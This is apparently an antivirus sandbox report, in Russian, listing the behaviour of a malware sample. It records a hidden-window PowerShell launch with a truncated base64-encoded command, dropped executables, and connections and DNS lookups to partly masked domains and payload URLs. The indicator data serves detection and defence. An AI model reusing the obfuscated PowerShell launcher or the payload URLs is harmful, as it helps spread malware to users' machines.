Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB0AGgAaQBlAHQAaAA9ACcAZwBhAHYAYgBpAG8AdwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AFIASQBUAFkAYABwAGAAUgBvAFQATwBgAGMAYABPAEwAIgAgAD0AIAAnAH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1984
- %TEMP%\1200427.cvr
- %HOMEPATH%\133.exe
- 'te###hint.com':443
- 'me##nor.gr':80
- 'me##nor.gr':443
- 'bn##ati.ir':80
- 'bn##ati.ir':443
- 'pk#.goog':80
- http://me##nor.gr/docs/q75cvd/
- http://bn##ati.ir/8iujk/b0/
- http://pk#.goog/gsr1/gsr1.crt
- 'te###hint.com':443
- 'me##nor.gr':443
- 'bn##ati.ir':443
- DNS ASK te###hint.com
- DNS ASK or#######onale.metodoinforma.it
- DNS ASK me##nor.gr
- DNS ASK bn##ati.ir
- DNS ASK pk#.goog
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB0AGgAaQBlAHQAaAA9ACcAZwBhAHYAYgBpAG8AdwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AFIASQBUAFkAYABwAGAAUgBvAFQATwBgAGMAYABPAEwAIgAgAD0AIAAnAH...' (со скрытым окном)